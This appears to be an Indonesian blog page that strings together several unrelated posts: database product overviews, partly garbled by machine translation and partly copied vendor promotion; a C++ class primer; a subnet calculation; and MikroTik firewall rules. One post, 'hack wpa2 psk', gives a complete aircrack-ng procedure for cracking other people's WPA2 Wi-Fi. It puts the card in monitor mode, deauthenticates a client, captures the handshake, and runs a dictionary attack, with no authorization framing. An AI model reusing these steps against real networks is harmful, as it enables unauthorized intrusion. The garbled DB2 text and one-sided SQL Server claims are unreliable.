Total Tayangan Halaman

Rabu, 19 Januari 2011

DATABASE

Microsoft SQL Server adalah sebuah sistem manajemen basis data relasional (RDBMS) produk Microsoft. Bahasa kueri utamanya adalah Transact-SQL yang merupakan implementasi dari SQL standar ANSI/ISO yang digunakan oleh Microsoft dan Sybase. Umumnya SQL Server digunakan di dunia bisnis yang memiliki basis data berskala kecil sampai dengan menengah, tetapi kemudian berkembang dengan digunakannya SQL Server pada basis data besar.
Microsoft SQL Server dan Sybase/ASE dapat berkomunikasi lewat jaringan dengan menggunakan protokol TDS (Tabular Data Stream). Selain dari itu, Microsoft SQL Server juga mendukung ODBC (Open Database Connectivity), dan mempunyai driver JDBC untuk bahasa pemrograman Java. Fitur yang lain dari SQL Server ini adalah kemampuannya untuk membuat basis data mirroring dan clustering. Pada versi sebelumnya, MS SQL Server 2000 terserang oleh cacing komputer SQL Slammer yang mengakibatkan kelambatan akses Internet pada tanggal 25 Januari 2003.
MySQL adalah sebuah perangkat lunak sistem manajemen basis data SQL (bahasa Inggris: database management system) atau DBMS yang multithread, multi-user, dengan sekitar 6 juta instalasi di seluruh dunia. MySQL AB membuat MySQL tersedia sebagai perangkat lunak gratis dibawah lisensi GNU General Public License (GPL), tetapi mereka juga menjual dibawah lisensi komersial untuk kasus-kasus dimana penggunaannya tidak cocok dengan penggunaan GPL.
PostgreSQL adalah sebuah sistem basis data yang disebarluaskan secara bebas menurut Perjanjian lisensi BSD. Piranti lunak ini merupakan salah satu basis data yang paling banyak digunakan saat ini, selain MySQL dan Oracle. PostgreSQL menyediakan fitur yang berguna untuk replikasi basis data. Fitur-fitur yang disediakan PostgreSQL antara lain DB Mirror, PGPool, Slony, PGCluster, dan lain-lain.
DB2 adalah salah satu keluarga sistem manajemen database relasional (RDBMS) produk-produk perangkat lunak yang lebih luas dalam IBM Information Management Software baris. Although there are different "editions" and "versions" of DB2, which run on devices ranging from handhelds to mainframes , most often DB2 refers to the DB2 Enterprise Server Edition, which runs on Unix ( AIX ), Windows , Linux and z/OS servers. Meskipun terdapat berbagai "edisi" dan "versi" dari DB2, yang berjalan pada perangkat mulai dari handheld ke mainframe, DB2 paling sering merujuk pada DB2 Enterprise Server Edition, yang berjalan pada Unix (AIX), Windows, Linux dan z / OS server. DB2 also powers the different IBM InfoSphere Warehouse editions. DB2 juga kekuatan yang berbeda Gudang InfoSphere IBM edisi. Alongside DB2 is another RDBMS : Informix , which was acquired by IBM in 2001. Samping lain DB2 RDBMS: Informix, yang diakuisisi oleh IBM pada tahun 2001.
Microsoft Access (atau Microsoft Office Access) adalah sebuah program aplikasi basis data komputer relasional yang ditujukan untuk kalangan rumahan dan perusahaan kecil hingga menengah. Aplikasi ini merupakan anggota dari beberapa aplikasi Microsoft Office, selain tentunya Microsoft Word, Microsoft Excel, dan Microsoft PowerPoint. Aplikasi ini menggunakan mesin basis data Microsoft Jet Database Engine, dan juga menggunakan tampilan grafis yang intuitif sehingga memudahkan pengguna. Versi terakhir adalah Microsoft Office Access 2007 yang termasuk ke dalam Microsoft Office System 2007.
Microsoft Access dapat menggunakan data yang disimpan di dalam format Microsoft Access, Microsoft Jet Database Engine, Microsoft SQL Server, Oracle Database, atau semua kontainer basis data yang mendukung standar ODBC. Para pengguna/programmer yang mahir dapat menggunakannya untuk mengembangkan perangkat lunak aplikasi yang kompleks, sementara para programmer yang kurang mahir dapat menggunakannya untuk mengembangkan perangkat lunak aplikasi yang sederhana. Access juga mendukung teknik-teknik pemrograman berorientasi objek, tetapi tidak dapat digolongkan ke dalam perangkat bantu pemrograman berorientasi objek.
Basis data Oracle adalah basis data relasional yang terdiri dari kumpulan data dalam suatu sistem manajemen basis data RDBMS. Perusahaan perangkat lunak Oracle memasarkan jenis basis data ini untuk bermacam-macam aplikasi yang bisa berjalan pada banyak jenis dan merk perangkat keras komputer (platform).
Oracle merupakan DBMS yang paling rumit dan paling mahal di dunia, namun banyak orang memiliki kesan yang negatif terhadap Oracle. Keluhan-keluhan yang mereka lontarkan mengenai Oracle antara lain adalah terlalu sulit untuk digunakan, terlalu lambat, terlalu mahal, dan bahkan Oracle dijuluki dengan istilah “ora kelar-kelar” yang berarti “tidak selesai-selesai” dalam bahasa Jawa. Jika dibandingkan dengan MySQL yang bersifat gratis, maka Oracle lebih terlihat tidak kompetitif karena berjalan lebih lambat daripada MySQL meskipun harganya sangat mahal.
Penggunaan Microsoft AccessMicrosoft Access digunakan kebanyakan oleh kalangan pembisnis kecil dan menengah. Selain itu Microsoft Access juga digunakan oleh para programmer untuk membuat sebuah sistem buatan sendiri untuk menangani pembuatan dan manipulasi data.
Microsoft Access juga dapat digunakan sebagai basis data untuk aplikasi web.

Berikut bebrapa kelebihan dan kelemahan menggunakan Microsoft Access:
KelebihanBeberapa pengembang aplikasi professional menggunakan Microsoft Access untuk mengembangkan aplikasi secara cepat atau yang sering disebut dengan Rapid Application Development / RAD Tool khususnya untuk pembuatan program yang lebih besar dan aplikasi yang berdiri sendiri untuk para salesman.
Dilihat dari segi perspektif programmer keunggulan Microsoft Acces adalah kompatibilitasnya dengan bahasa pemrograman Structured Query Language ( SQL ).
Microsoft Access mengizinkan pengembangan yang relatif cepat karena semua table basis data, kueri, form, dan report disimpan di dalam berkas basis data miliknya. Misalnya untuk membuat query, Microsoft menggunakan Query Design Grid, sebuah program berbasis grafis yang mengizinkan para penggunanya untuk membuat query tanpa harus mengetahui bahasa SQL nya.
Bahasa Pemrograman yang digunakan di dalam Microsoft Access adalah Microsoft Visual Basic for Applications ( VBA ) seperti halnya dalam beberapa aplikasi Microsoft Office lainnya.

KelemahanKarena kurang begitu bagus jika diakses melalui jaringan maka bayak pengguna Microsoft Access menggunakan solusi system manajemen basis data yang bersifat klien / server.
kelebihan PostgreSQL adalah kemampuannya menampung data spasial, sehingga ia bisa digunakan dalam pembuatan situs yang berbasis Web GIS
Penyebab utama MySQL begitu popular di kalangan Web adalah karena ia memang cocok bekerja di lingkungan tersebut. Pertama, MySQL tersedia di berbagai platform Linux dan berbagai varian Unix. Sesuatu yang tidak dimiliki Access, misalnya—padahal Access amat popular di platform Windows. Banyak server Web berbasiskan Unix, ini menjadikan Access otomatis tidak dapat dipakai karena ia pun tidak memiliki kemampuan client-server/networking.
Kedua, fitur-fitur yang dimiliki MySQL memang yang biasanya banyak dibutuhkan dalam aplikasi Web. Misalnya, klausa LIMIT SQL-nya, praktis untuk melakukan paging. Atau jenis indeks field FULLTEXT, untuk full text searching. Atau sebutlah kekayaaan fungsi-fungsi builtinnya, mulai dari memformat dan memanipulasi tanggal, mengolah string, regex, enkripsi dan hashing. Yang terakhir misalnya, praktis untuk melakukan penyimpanan password anggota situs. Sementara fitur-fitur yang lebih jarang digunakan belum atau baru muncul saja di versi-versi terakhir. Subselek misalnya, sampai saat ini tidak ada di MySQL. Atau view, atau stored procedure, atau trigger. Ini membuat MySQL tetap langsing dan cepat, tapi pengembang aplikasi bisnis mungkin jadi berkerut muka mengetahui ini, karena fitur-fitur yang hilang ini seringkali mereka pakai untuk menyederhanakan logika aplikasi mereka. Jangankan itu, sebelum sekitar versi 3.23.15—yang berarti sekitar dua tahun lalu—MySQL tidak bisa melakukan transaksi sama sekali!
Ketiga, MySQL memiliki overhead koneksi yang rendah. Soal kecepatan melakukan transaksi atau kinerja di kondisi load tinggi mungkin bisa diperdebatkan dengan berbagai benchmark berbeda, tapi kalau soal yang satu ini MySQL-lah juaranya. Karakteristik ini membuat MySQL cocok bekerja dengan aplikasi CGI, di mana di setiap request skrip akan melakukan koneksi, mengirimkan satu atau lebih perintah SQL, lalu memutuskan koneksi lagi. Cobalah melakukan hal ini dengan Interbase atau bahkan Oracle. Maka dengan load beberapa request per detik saja server Web/database Anda mungkin akan segera menyerah karena tidak bisa mengimbangi beban ini.

PostgreSQL

Di bawah popularitas MySQL, membayanglah PostgreSQL. Kalau MySQL disebut-sebut sebagai database open source paling popular, maka PostgreSQL sering dijuluki database open source paling mutakhir (advanced). Kedua database ini kadang begitu terlihat kontras satu sama lain, sehingga tidaklah mewakili sama sekali kalau kita katakan keduanya “bersaing.” Kalau MySQL dikembangkan terutama di Eropa, PostgreSQL mula-mula di Amerika (di Universitas of California di Berkeley, sama seperti sistem operasi Unix). Kalau latar belakang pengembangan MySQL adalah untuk kebutuhan bisnis klien, maka PostgreSQL berawal dari proyek akademik. Kalau MySQL berfokus pada kelangsingan dan kecepatan, maka PostgreSQL pada kelengkapan fitur, portabilitas, dan reliabilitas (meski ironis bahwa kini MySQL lebih portabel dalam hal ketersediaan di Windows). Kalau MySQL merupakan sebuah database relasional (RDBMS), maka PostgreSQL disebut objek-relasional (ORDBMS) karena fitur OO-nya seperti pewarisan tabel dan tipe data. [Lihat artikel MySQL vs PostgreSQL].
PostgreSQL memiliki sejarah yang lebih panjang dan berliku. Pertama memulai hidupnya dalam wujud bernama Ingres (“Interactive Graphics and Retrieval System”), yang dikembangkan di Universitas Berkeley mulai tahun 1977 hingga 1985. Pemimpin proyek Ingres adalah Profesor Michael Stonebraker dan Eugene Wong. Ingres mula-mula dikembangkan di atas platform komputer mini PDP-11. Belum ada SQL waktu itu, dan Ingres memiliki bahasa query tersendiri yang disebut QUEL.
Kode Ingres kemudian dikomersilkan sehingga berdirilah Relational Technologies (yang lalu berganti nama menjadi Ingres Corporation, dan kini berada di bawah perusahaan Computer Associates). Sementara itu, dari universitas yang sama, didirikan pulalah perusahaan Sybase dan Illustra (yang lalu bernama Informix, dan kini telah dibeli oleh IBM) oleh para alumninya. Profesor Stonebraker sempat terlibat di ketiga perusahaan ini. Salah satu pendiri Ingres juga merupakan pendiri Illustra. Jadi dari Ingres lahir berbagai produk database: Ingres sendiri, Sybase, dan Informix. Database komersial Ingres (yang mengalami berbagai metamorfosis nama, mulai dari Ingres II, Ingres NET, CA-Ingres, CA-OpenIngres, CA Advantage Ingres) masih ada dan dijual hingga kini.
Dari proyek Ingres juga lahirlah proyek penerusnya, Postgres (1986–1994). Dipimpin juga oleh Stonebraker, proyek ini bertujuan membuat Ingres agar menjadi lebih berorientasi objek. Kode Postgres inilah yang diambil menjadi Illustra dan Informix.
Tahun 1995 dua mahasiswa S2 di universitas yang sama, Jolly Chen dan Andrew Yu, menambahkan SQL pada Postgres untuk menggantikan QUEL. Hasilnya adalah Postgres95. Akhirnya kedua mahasiswa pun lulus dan meninggalkan Berkeley, namun Chen masih terus memaintain Postgres95. Produk ini memiliki komunitas yang aktif berdiskusi di mailing list. Setahun berikutnya, Postgres95 jadi bertambah popular. Anggota mailing list telah mencapai 1000 orang. Seseorang bernama Marc G. Fournier dari Kanada menawarkan sebuah server untuk dipakai menjadi host mailing list dan CVS. Hingga saat itu, ada empat orang yang menjadi pengembang utama Postgres95: Chen, Fournier, dan dua orang lain yaitu Thomas Lockhart di California, AS dan Vadim Mikheev di Rusia. Namun Postgres95 dikembangkan bersama-sama lewat Internet dan sumbangan patch dan berbagai orang di seluruh pelosok dunia.
Sayangnya, proyek ini belum terkelola secara baik, apalagi profesional. Semua pengembang utamanya punya karir masing-masing. Mereka hanya mengembangkan Postgres95 sebagai kerja hobi atau sampingan. Padahal jumlah pemakai sudah cukup banyak. Laporan-laporan bug banyak yang tidak tertangani dengan baik. Menurut Chen, keluarga Postgres secara tradisional dikembangkan dalam suasana akademik, dan belum siap untuk menerima sumbangan kode dan laporan bug yang begitu banyak. Lagipula, kode turun-temurun dari Ingres dan Postgres ini belum sepenuhnya dimengerti, bahkan oleh Chen. Untungnya, para pengembang Postgres95 berdedikasi untuk berbenah diri.
Pertengahan 1996, nama Postgres95 sepakat dianggap sudah basi, maka lahirlah PostgreSQL (baca: post-grés-kju-él), dengan label versi dimulai dari angka 6.0 (versi terakhir dari Postgres/Berkeley adalah 4.2, dan Postgres95 dianggap versi 5.x). Di sinilah, dan juga berlanjut di keluarga 7.0–7.1, banyak terjadi peningkatan dalam hal skalabilitas, fitur, dan kecepatan.
Meskipun demikian, perbaikan berlangsung tidak secara tiba-tiba, melainkan berangsur-angsur. Para pengembangnya perlu terlebih dulu masih perlu membenahi kode-kode lama dan kode yang belum sepenuhnya dimengerti. Hingga versi 6.4 (1998) misalnya—di mana banyak ditambahkan fitur baru seperti dukungan karakter internasional, bahasa stored procedure baru, view, dan beberapa sintaks SQL tambahan—banyak terjadi masalah stabilitas. Beberapa pemakai melaporkan menjalankan proses server PostgreSQL yang lalu secara misterius tiba-tiba mati tanpa laporan apa-apa di log—alias crash. Sebagian yang lain melaporkan diskonek secara acak. Dan sebagian lagi mengeluhkan kurang memuaskannya kinerja PostgreSQL. Bahkan ada pemakai yang membelot ke MySQL. Periode ini merupakan saat-saat yang cukup mengkhawatirkan bagi popularitas PostgreSQL. Contohnya, lihat www.phpbuilder.com/columns/tim20000705.php3 di mana Tim Perdue menceritakan bahwa di tahun 1999, ia terpaksa beralih ke MySQL dalam membangun SourceForge. Kinerja PostgreSQL terlalu berbeda dengan MySQL sehingga mau tak mau pengguna setia PostgreSQL ini harus berganti database.
Versi 6.5 menurut pengembang PostgreSQL merupakan babak baru pemahaman mereka terhadap keseluruhan source code PostgreSQL. Versi ini juga merupakan versi perbaikan bug yang penting; ada banyak bug seperti berbagai kasus crash, kebocoran memori, dan kejanggalan/kekurangan pada sintaks SQL-nya diperbaiki. Selain itu, di versi 6.5 ditambahkan MVCC oleh Vadim, yang berpotensi meningkatkan kinerja PostgreSQL secara signifikan. MVCC, atau Multi Version Concurrency Control, serupa dengan InnoDB pada MySQL dalam hal memberikan kemampuan PostgreSQL memperlihatkan lebih dari satu versi tampilan data bagi klien. Perubahan data yang dibuat oleh klien yang sedang melakukan transaksi tidak akan terlihat dulu oleh klien lain sebelum transaksi dicommit. Ini menghindari locking yang tidak perlu.
Versi 6.5.x (1999, seri terakhir dari 6.x) cukup berhasil dan memuaskan bagi para pemakainya. Namun masih ada beberapa kekurangan PostgreSQL yang dirasakan mengganjal bagi banyak orang. Kekurangan-kekurangan ini lambat laun diperbaiki di seri 7.x, dan menurut Bruce Momjian, di seri 7.3 ia berharap PostgreSQL akan sepenuhnya layak dan sebanding dengan database komersial dalam hal fitur penting. Satu keterbatasan yang paling menyebalkan yaitu ukuran data maksimum sebuah field hanya 8–32KB. Ini menyebabkan orang sulit menyimpan teks panjang atau gambar di dalam database. Keterbatasan ini akhirnya dihapuskan di 7.1. Penambahan penting lainnya antara lain foreign key constraint (ditambahkan di 7.0), write-ahead logging untuk peningkatan keamanan dan kinerja (7.1), serta OUTER JOIN. Masih ada lagi fitur seperti replikasi yang rencananya akan ditambahkan setelah 7.2.
Pengguna setia PostgreSQL boleh berbangga dengan seri 7.x. Di seri ini PostgreSQL mulai menantang dan bahkan mengungguli MySQL dalam hal kecepatan, terutama di query-query kompleks dan pada kondisi load tinggi. Dalam artikelnya Tim Perdue melaporkan hasil benchmark MySQL 3.23 dan PostgreSQL 7.0 dan kesimpulannya adalah: PostgreSQL memang telah menjadi semakin baik. Dan kecepatannya cukup mengagumkan. Stabil pula.
Versi terbaru PostgreSQL saat artikel ini ditulis yaitu 7.2 (dirilis Februari lalu). PostgreSQL dikembangkan dengan siklus rilis sekitar 4 bulan, jadi kita bisa mengharapkan rilis berikutnya sekitar bulan Juni 2002. Hingga sekarang, di antara pengembang inti PostgreSQL yang paling aktif antara lain Thomas, Vadim, Tom Lane (AS), Tatsuo Ishii (Jepang), Hiroshi Inoue (Jepang), Philip Warner (Australia), dan Bruce Momjian (AS).

Fitur OO PostgreSQL

Yang membedakan PostgreSQL dan MySQL adalah kemampuan OO. Di PostgreSQL, kita dapat mendefinisikan sebuah tabel yang mewarisi definisi tabel lain. Misalnya, ada tabel Karyawan yang memiliki field partyId dan currentSalary. Kita dapat mendefinisikan tabel KaryawanDivisiA dengan hanya mendefinisikan field tambahan postId dan ditambah klausa SQL INHERITS (Karyawan). Field-field lain akan otomatis diambil dari tabel induknya, Karyawan. Bukan tabel saja, tipe data baru pun dapat didefinisikan. Dan uniknya, PostgreSQL pun memiliki tipe data geometri (seperti titik, garis, lingkaran, poligon) yang mungkin berguna bagi aplikasi ilmiah tertentu. Satu lagi, anehnya, PostgreSQL memberikan kita kemampuan mendefinisikan sebuah field sebagai array. MySQL mungkin tidak akan memiliki semua ini dalam waktu dekat.
Dari segi kekayaan SQL, para pengembang database mungkin akan lebih tergiur. PostgreSQL memiliki hampir semua fasilitas standar yang biasanya diinginkan: view (tabel virtual), trigger, subselek, stored procedure (dalam beberapa bahasa), dan foreign key constraint. PostgreSQL juga memiliki apa yang disebut rule, yaitu tindakan custom yang bisa kita definisikan dieksekusi saat sebuah tabel di-INSERT, UPDATE, atau DELETE. Sistem rule ini memungkinkan kita mengendalikan bagaimana data kita diubah atau diambil. Misalnya, kita dapat membuat sebuah tabel mernjadi bersifat append-only dengan membuat rule yang membatalkan efek DELETE dan UPDATE. Atau kita bisa melakukan pengecekan data sebelum terjadinya perubahan pada tabel. Atau melindungi row tertentu agar tidak bisa diambil datanya, dsb. Rule ini dipakai untuk mengimplementasi view. Meski begitu mungkin Anda perlu menghindari menggunakan rule secara eksplisit karena fasilitas ini tidak ada dalam standar (SQL92).
Fitur-fitur menarik pada SQL Server 2000
Berikut ini adalah beberapa fitur yang menarik untuk diangkat dari sekian banyak fitur yang ada pada SQL Server 2000. Diantaranya adalah:
  • XML Support
  • Multi-Instance Support
  • Data Warehousing/Business Intelligence Improvements
  • Performance and Scalability Improvements
  • Query Analyzer Improvements
  • DTS Improvements
  • Transact SQL Enhancements
SQL Server 2005 terus melebihi DB2 dalam fitur, fungsionalitas, dan inovasi dengan biaya yang jauh lebih rendah. Kemudahaan penggunaan dan tool-tool manajemen membantu organisasi berhemat dalam biaya administrasi basis data, sembari menutup integrasi dengan Visual Studio dan Microsoft .NET common language runtime (CLR) membuat SQL Server 2005 menjadi platform yang ideal untuk membangun aplikasi-aplikasi basis data yang ampuh.
SQL Server 2005 pada Microsoft Windows Server memberikan keamanan dan ketersediaan yang lebih, serta skalabilitas dari bisnis kecil sampai yang terbesar, semuanya dengan biaya yang jauh lebih rendah.

SQL Server adalah pemimpin platform data


Ketersediaan tingkat tertinggi tanpa biaya tambahan

SQL Server 2005 memiliki lebih banyak opsi ketersediaan yang tinggi daripada DB2, termasuk pencerminan data dengan failover otomatis, penambahan memori, pemulihan cepat, snapshot basis data, dan pengembalian halaman. SQL Server 2005 juga mencakup tool-tool yang memfasilitasi backup dan restore, yang membuat SQL Server 2005 menjadi sebuah pilihan yang lebih baik untuk aplikasi-aplikasi ketersediaan yang tinggi daripada DB2. Banyak dari fitur tersebut yang tidak tersedia dalam DB2, atau tersedia dengan biaya tambahan.

Kinerja dan Skalabilitas Superior SQL Server 2005

Tak perduli seberapa banyak data yang diandalkan dan didukung oleh organisasi anda, SQL Server 2005 memiliki sebuah edisi yang dirancang untuk menanganinya, dari bisnis kecil sampai perusahaan terbesar.
Pengukuran Kinerja
SQL Server
IBM DB2
Harga/kinerja TPC-E*
Kinerja TPC-E*
Harga/kinerja TPC-C
Kinerja TPC-C
Harga/kinerja TPC-H 100GB
Kinerja TPC-H 100GB
Harga/kinerja TPC-H 300GB
Kinerja TPC-H 300GB
Harga/kinerja TPC-H 1TB
Kinerja TPC-H 1TB
Harga/kinerja TPC-H 3TB
Kinerja TPC-H 3TB
Belum ada hasil IBM DB2 yang dikirimkan. Tabel ini mendaftar semua pengukuran kinerja TPC dimana SQL Server telah mengirimkan hasilnya.


Temukan informasi lebih lanjut tentang pengujian kinerja SQL Server

SQL Server lebih aman daripada DB2

SQL Server 2005 memberikan fitur-fitur keamanan yang cerdas yang merepresentasikan sebuah standard keamanan yang lebih tinggi daripada apa yang disediakan oleh IBM DB2, dan SQL Server 2005 memberikan standard yang lebih tinggi ini ke semua pengguna, dari pengembang ke pelanggan, dengan kemudahan manajemen dan programabilitas. Sejak bulan Juli 2003 beberapa kerentanan kritis keamanan basis data Oracle telah teridentifikasi, berbanding nol untuk SQL Server selama periode tersebut.
SQL Server 2005 memiliki sertifikasi Common Criteria seperti halnya pemenuhan FIPS 140-2. Baca lebih lanjut tentang sertifikasi Common Criteria.
Temukan lebih lanjut tentang fitur-fitur yang hanya ditawarkan SQL Server 2005 bagi para pengembang untuk meningkatkan keamanan data:
  • Dapatkan fakta-fakta tentang keamanan basis data
    Temukan lebih lanjut tentang sumber daya kunci untuk mengamankan basis data anda dan teknik terbaik dari para spesialis keamanan, dan pelajari dari pemahaman berbagai ahli industri tentang klaim keamanan vendor basis data.

SQL Server lebih mudah dikelola dan lebih produktif daripada DB2

SQL Server 2005 adalah sebuah lingkungan yang lebih produktif untuk para pengembang dan administrator basis data. Integrasi SQL Server 2005 dengan Visual Studio .NET memberikan sebuah platform yang lebih baik untuk para pengembang .NET untuk membangun aplikasi-aplikasi berbasis data. Sementara baik SQL Server 2005 maupun DB2 memberikan kemampuan untuk melekatkan logika .NET logic didalam basis data, SQL Server 2005 memiliki beberapa manfaat yang signifikan diatas DB2. Dukungan terdalam SQL Server 2005 untuk CLR (common language runtime) memberikan sebuah solusi total yang lebih efektif, yang meningkatkan kegunaan memory, threading, dan kemampuan garbage collection dari CLR dengan cara yang tidak diperkenankan dalam implementasi DB2. Lebih jauh lagi, SQL Server 2005 mendukung lebih banyak obyek basis data .NET database daripada DB2.
SQL Server memberikan sebuah lingkungan pengembangan tunggal yang terintegrasi. Lingkungan yang sama digunakan untuk mengembangkan basis data, pelaporan, analisis, ETL dan aplikasi-aplikasi yang melekat, dan sebuah tool tunggal digunakan untuk mengelola semua basis data dan server IB. DB2 mengharuskan pelanggan untuk mempelajari dan mendukung metodologi dan tool yang berbeda untuk versi-versi DB2 yang sangat berbeda (Mainframe, AS/400, dan DB2 UDB), seperti halnya untuk produk-produk ETL dan IB.
Untuk administrator, kemampuan seperti penambalan terintegrasi, penyetelan mandiri, Management Studio yang tangkas dan mudah digunakan, seperti halnya pembuatan profil dan penyetelan berbasis GUI yang memberikan sebuah lingkungan manajemen yang lebih cepat dan lebih produktif. Dokumen-dokumen berikut menguji tool dan tingkat integrasi yang sesuai untuk SQL Server 2005 dan DB2:

hack wpa2 psk

Satu satunya kelemahan wpa2 psk dan wpa adalah ketika sebuah client melakukan koneksi ke AP dimana terjadinya proses handshake, kita bisa melakukan Bruto Force yang akan mencoba satu persatu password yang ada dengan didapatkan dari proses handshake. Melakukan Bruto Force adalah melakukan dengan mengunakan dictionary file yang artinya kita harus mempunyai file berisi passpharase yang akan di coba satu persatu dengan paket handshake untuk mencari keys yg digunakan tersebut.
Ga usah panjang lebar dan basa basi lagi, saya tulis ini supaya saya tidak lupa dengan langkah cara hack wpa2 psk menggunakan Backtrack 4, VM Ware Workstation dan menggunakan windows XP sp2 menurut pengalaman saya. Langkah pertama buat yang mau nyoba silahkan persiapkan laptop, usb wireless, Backtrack 4 yang bisa di download disini serta VM Ware Workstation yang bisa di dowload disini dan jangan lupa rokok malboro merah rek…. hehehehe
Instal VM Ware Workstation, saya menggunakan Windows XP SP2 karena stabil menurut saya setelah itu runing (jalankan) Backtrack 4 yang berupa file ISO menggunakan VM Ware Workstation kemudian tancapkan USB wireles ke laptop dan aktifkan, bagi yang masih bingung bisa liat tutorial di youtube klik disini setelah Backtrack 4 siap lakukan perintah ini di terminal :
  1. root@bt:-# airmon-ng
  2. root@bt:-# airmon-ng stop wlan0
  3. root@bt:-# airmon-ng start wlan0
  4. root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)
  5. root@bt:-# airodump-ng -c 6 -w zhome –bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka  terminal  kedua dan ketikan)
  6. root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)
  7. root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de adalah dictionary passpharase bawaan backtrack 4)
oke selamet mencoba kalau mau nyoba.

Bahasa C++

C++ adalah salah satu bahasa pemrograman komputer,  yang dikembangkan dari bahasa pendahulunya,  yaitu bahasa C.
Bahasa ini Dibuat pada tahun 1980-an oleh Bjarne Stroustrup) yang berasal dari Bell Lab.
tidak seperti pendahulunya, yaitu bahasa C, bahasa ini sudah mendukung  pemakaian konsep pemrograman berorientasi objek (Object Oriented Programming).
Saat ini, Bahasa C++ banyak dipakai di berbagai industri software,  dan sampai saat ini C++ masih termasuk sebagai salah satu bahasa pemrograman yang paling populer.  beberapa aplikasi, seperti systems software, application software, device drivers, embedded software, high-performance server and client applications, dan entertainment software dibuat menggunakan bahasa C++.
dibanding dengan pendahulunya , ada beberapa hal yang ditambahkan yang sebelumnya tidak dimiliki oleh bahasa pendahulunya, hal yang ditambahkan tersebut adalah :
  1. Class
    Class adalah keyword yang digunakan untuk membuat sebuah user define abstract data type, dengan tujuan untuk menyerdehanakan suatu permasalhan yang berkaitan dengan objek
    contoh pembuatan kelas dalam bahasa C++ :
    class Hero
    {
    private :
    int x;
    int y;
    int vx;
    int vy;
    public :
    //method
    void walk()
    {
    this->x = x+vx;
    this->y = y+vy;
    }
    //constructor
    Hero(int vx, int vy)
    {
    this->vx = vx;
    this->vy = vy;
    this->x = this->y = 0;
    }
    //destructor
    ~Hero()
    {
    this->vx = this->vy = this->x = this->y = 0;
    }
    }ryu;
    //akhir dari kelas
    dalam hal ini ryu adalah objek dari kelas Hero, sedangkan kelas Hero adalah blue print/rancangan untuk membuat objek
  2. Constructor  dan Destructor
    seperti yang kita lihat di no 1, disana terdapat constructor dan destructor. Constructor adalah fungsi yang akan dijalankan ketika kita membuat sebuah objek dari suatu kelas, untuk menginisialisasi data yang dimiliki oleh objek. dari method2 yang ada dalam suatu objek,  Constructor  akan dipanggil paling pertama.
    sedangkan Destructor adalah fungsi yang akan dipanggil terakhir kali untuk membersihkan memori.
  3. overloading
    overloading adalah penggunaan nama yang sama untuk beberapa fungsi maupun method, namun dalam tiap2 fungsi tersebut memiliki perbedaan, walupun namanya sana. perbedaan itu mencakup parameter maupun return value dari suatu fungsi
  4. overiding
    overiding adalah  definisi ulang dari suatu method dengan menggunakan nama yang sama. singkatnya , bisa terdapat method yang menggunakan nama, return value dan  parameter yang sama, namun operasi  masing  method  itu berbeda
  5. access modifier
    seperti yang kita lihat di no 1 diatas, kita dapat memberi access modifier.  access modifier di bahasa C++ ada 3 yaitu
    1. private
    yaitu pembatasan agar data dari suatu kelas hanya dapat diakses oleh kelas itu sendiri
    2.protected
    yaitu pembatasan agar data dari suatu kelas  hanya dapat diakses oleh kelas itu sendiri dan kelas turunannya
    3. public
    yaitu pengizinan agar data-data dari suatu kelas dapat diakses oleh siapapun
  6. extend
    yaitu  penurunan sifat dari suatu Class ke Class lain
    contoh :
    class Kendaraan
    {
    };
    //extends
    class Mobil : Kendaraan
    {
    };
    dengan adanya extends, maka apa yang dimiliki dari Class kendaraan akan diturunkan ke Class mobil
sebenarnya masih banyak fitur C++ yang lain, namun yang paling penting untuk diketahui adalah beberapa hal diatas
karena bahasa C++ sudah mendukung adanya konsep Object Oriented Programming, maka tentu saja bahasa ini juga mendukung ciri dasar dari OOP, yaitu Abstraction, Encapsulation dan Polymorphism, dengan menggunakan keenam fitur tersebut

Hitung Subnet mask

cara hitung subnet mask:
1. Ubah IP number ke bilangan biner
2. Ubah Subnet mask ke bilangan biner
3. Lakukan operasi AND [1-1=1, 0-1=0, 0-0=0, 1-0=0]
4. Hitung jumlah host = 2 pangkat n – 2
5. Hitung jumlah subnet= 2 pangkat m
Ex [untuk network kelas C]
IP: 192.168.13.17/28
Subnet: 255.255.255.240
240 didapat dari konversi subnet ke bilangan biner, dan terdapat 28 angka biner bernilai1
1111 1111.1111 1111.1111 1111.11110000
|________| |_______| |________| |________|
255 255 255 240 [128+64+32+16]
IP biner: 11000000.10101000.00001101.00010001
Subnet :11111111.11111111.11111111.11110000
—————————————————————————A ND
11000000.10101000.00001101.00010000
IP network: 192.168.13.16 |___16___| <------------------------------------------
IP broadcast: 192.168.13.31-----> 00011111 [angka 0 dibelakang 1 dari ip address diganti 1] |
Jumlah host: 2 pangkat 4 – 2 = 16 -2 =14 [4 didapat dari jumlah angka 0 dari subnet mask------|
Jumlah subnet: 2 pangkat 4 = 16 [4 didapat dari jumlah angka 1 dari oktet ke 4 dari subnet mask ---------------------|
berarti ada 16 subnet dengan jumlah host masing masing subnet=14, kelipatan yang
digunakan [256-240 =16] = 16

Melindungi Pelanggan/User Anda pada Firewall

Untuk melindungi network pelanggan/user anda, kita harus memeriksa semua traffic yang melewati router dan blok yang tidak diinginkan.
Untuk traffic ICMP, TCP, UDP kita akan membuat chain dimana akan melakukan DROP untuk paket-paket yang tidak diinginkan. Untuk awalnya kita dapat meng-copy dan paste command dibawah ini melalui terminal console pada RouterOS kita :
Code:
/ip firewall filter

add chain=forward connection-state=established comment="allow established connections"

add chain=forward connection-state=related comment="allow related connections"

add chain=forward connection-state=invalid action=drop comment="drop invalid connections"
Pada rule diatas, 2 rule pertama berurusan dengan paket untuk koneksi telah terbuka dan berhubungan dengan koneksi lainnya. Kita mengasumsikan bahwa paket tersebut tidak bermasalah. Pada rule selanjutnya kita akan melakukan DROP pada paket dari koneksi yang Invalid.
This image has been resized. Click this bar to view the full image. The original image is sized 520×210.

